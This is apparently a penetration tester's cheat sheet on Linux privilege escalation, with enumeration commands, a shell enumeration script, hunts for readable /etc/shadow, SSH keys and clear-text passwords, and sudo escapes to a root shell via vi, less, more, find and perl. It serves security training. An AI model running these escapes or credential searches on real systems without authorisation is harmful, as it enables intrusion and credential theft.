Privilege Escalation +Videos

Windows Privilege Escalation

I just watched this one and found it very refreshing. 😉 (privesc/windows/)

 Linux Privilege Escalation

Binary exploits should be a last resort (use more stable methods first when available: sudo rules, weak permissions, cron jobs, misconfigured services).

Some privilege escalation is a waiting game: dropping a file into /etc/cron.d means waiting until cron runs the job, and a planted boot-time script needs a reboot.

System/User info:

uname -a, id, env, whoami, history, pwd

Distribution info: cat /etc/*release /etc/issue* (on newer systems also /etc/os-release)

Ptrace exploits:

Look for web servers, mail servers and other daemons running as root: a command injection in a root service gives you root directly.

*Exploiting a root-owned service binary is less dangerous than a kernel exploit: if the service crashes the machine stays up, and init will probably restart the service.

Run ltrace (or strace) against any setuid and setgid programs found to see which libraries, files and helper programs they touch. Caveat: a traced process is not granted its setuid privileges, so you see the code path, not the privileged behaviour.

Look for setuid programs with:

find / -user root -perm -4000 -exec ls -ld {} \; 2>/dev/null > /tmp/gaping-security-hole

Cron jobs: weak permissions on scripts

Always check both world-writable and user-writable scripts (and writable directories the scripts live in).

Weak permissions on binaries

User-writable binaries are less common than writable scripts, but check anyway.

Weak permissions around LD_PRELOAD and the loader

LD_PRELOAD from the environment is ignored for setuid programs, so it only helps if sudo preserves it (env_keep) for a command you may run as root.

/etc/ld.so.preload is honoured for every process, and if an installation's lib directory (or a directory listed in /etc/ld.so.conf*) is poorly permissioned, a library loaded by a root process can be replaced: an exploitation opportunity.

Who else has logged in?

who, w, last

Are you in the sudoers file?

sudo -l, cat /etc/sudoers /etc/sudoers.d/*

*Users with restricted sudo access (a single editor, pager, interpreter or find allowed as root) can usually turn it into an unrestricted root shell; see the examples below.*

Obscure text editors or other unexpected binaries with the setuid bit set may be a planted backdoor (or an easy escape).

Other super users?

grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'

Network Info

ifconfig -a (or ip a), netstat -antup (or ss -antup), lsof -i

Vulnerable OS?

Get the kernel version from uname -a, then use searchsploit to search exploit-db for local privesc exploits:

searchsploit kernel 2.6 linux | sort -n


Enumerate services/software

ps aux, ps -ef

Look for services running as a privileged user

List versions of installed software

dpkg -l, rpm -qa, httpd -v, mysql --version, python --version, ruby -v

determine versions then searchsploit again

SUID Files?

find / -perm -u=s -type f 2>/dev/null

Password hashes?

cat /etc/shadow (only readable when misconfigured; also check for readable backups of it)

Any files that you can overwrite to get root?

Check jobs / Tasks?

ls -la /etc/cron*

SSH Keys

ls -la ~/.ssh/  (check other user’s dirs too)

Look for clear-text creds in files for various scripts, DBs, config files:

find . -maxdepth 4 -type f -exec grep -il "password" {} +


Linux privesc scripts: unix-privesc-check, LinEnum
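A compact enumeration script, added here as an example in the spirit of the scripts named above (it is not LinEnum or unix-privesc-check, and not part of the original notes): it automates the setuid/setgid, world-writable cron script, UID 0 account, writable loader config and clear-text "password" checks from the checklist. Each function takes its search root as an argument so it can be pointed at any directory; run_all() applies them to the real system paths. The name privesc_enum.sh and the PRIVESC_ENUM_RUN variable are assumptions of this example.

```shell
#!/bin/sh
# privesc_enum.sh: minimal local privesc enumeration (added example, not
# part of the original notes, LinEnum or unix-privesc-check).

# Setuid regular files under $1 (the "gaping-security-hole" list).
find_suid() {
    find "$1" -type f -perm -4000 2>/dev/null | sort
}

# Setgid regular files under $1.
find_sgid() {
    find "$1" -type f -perm -2000 2>/dev/null | sort
}

# World-writable regular files under $1 (cron scripts, libraries, binaries).
find_world_writable() {
    find "$1" -type f -perm -0002 2>/dev/null | sort
}

# Accounts with UID 0 in the passwd file $1 (comment lines skipped).
uid0_users() {
    grep -v '^#' "$1" | awk -F: '$3 == 0 { print $1 }'
}

# Files under $1 (at most $2 levels deep) mentioning "password",
# case-insensitive: candidates for clear-text credentials.
find_password_mentions() {
    find "$1" -maxdepth "$2" -type f -exec grep -lis 'password' {} + 2>/dev/null | sort
}

# Loader config a root process trusts: /etc/ld.so.preload and every
# directory named in /etc/ld.so.conf*. Prints only the ones we can write.
writable_loader_paths() {
    {
        echo /etc/ld.so.preload
        cat /etc/ld.so.conf /etc/ld.so.conf.d/*.conf 2>/dev/null | grep '^/'
    } | sort -u | while read -r p; do
        if [ -w "$p" ]; then echo "$p"; fi
    done
}

# Cron: list the cron directories, then any world-writable script in them.
cron_targets() {
    ls -la /etc/cron* 2>/dev/null
    for d in /etc/cron.d /etc/cron.hourly /etc/cron.daily /etc/cron.weekly /etc/cron.monthly; do
        find_world_writable "$d"
    done
}

run_all() {
    echo "== kernel / user =="; uname -a; id
    echo "== sudo rights (non-interactive) =="
    sudo -n -l 2>/dev/null || echo "(none, or a password is required)"
    echo "== UID 0 accounts =="; uid0_users /etc/passwd
    echo "== setuid files =="; find_suid /
    echo "== setgid files =="; find_sgid /
    echo "== cron directories and world-writable cron scripts =="; cron_targets
    echo "== writable loader config =="; writable_loader_paths
    echo "== files mentioning 'password' under /etc and /var/www =="
    find_password_mentions /etc 4
    find_password_mentions /var/www 4
}

# The full sweep runs only when asked, so the functions can be sourced on
# their own:   PRIVESC_ENUM_RUN=1 sh privesc_enum.sh
if [ "${PRIVESC_ENUM_RUN:-0}" = 1 ]; then
    run_all
fi
```

Errors are silenced so the output is only findings; redirect it to a file and read it next to sudo -l, since a world-writable cron script or a writable loader path listed here is usually a faster and more stable route than any kernel exploit.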


nmap example:

nmap --interactive (only old Nmap releases still have the interactive mode)


vi example:

sudo vi /etc/shadow

shell (you can run shell in vi)

less example:

sudo less /etc/shadow

v (press v key. drops in editor)

More example:

sudo more /etc/shadow  (any file works, it just needs to be longer than one screen so that more pauses)

? (type ? at the --More-- prompt)

!bash (runs a shell as root)

SUDO copy, move, and find:

sudo cp and sudo mv: overwrite /etc/shadow, /etc/passwd or /etc/sudoers with a prepared copy, or copy them out, to obtain a backdoor.

sudo find /etc -exec bash -i \;

sudo with script interpreters:

sudo perl -e 'exec "/bin/sh";'


Author: McPeters Joseph

Joseph McPeters is a Security Researcher. He specializes in network and web application penetration testing. Contact:
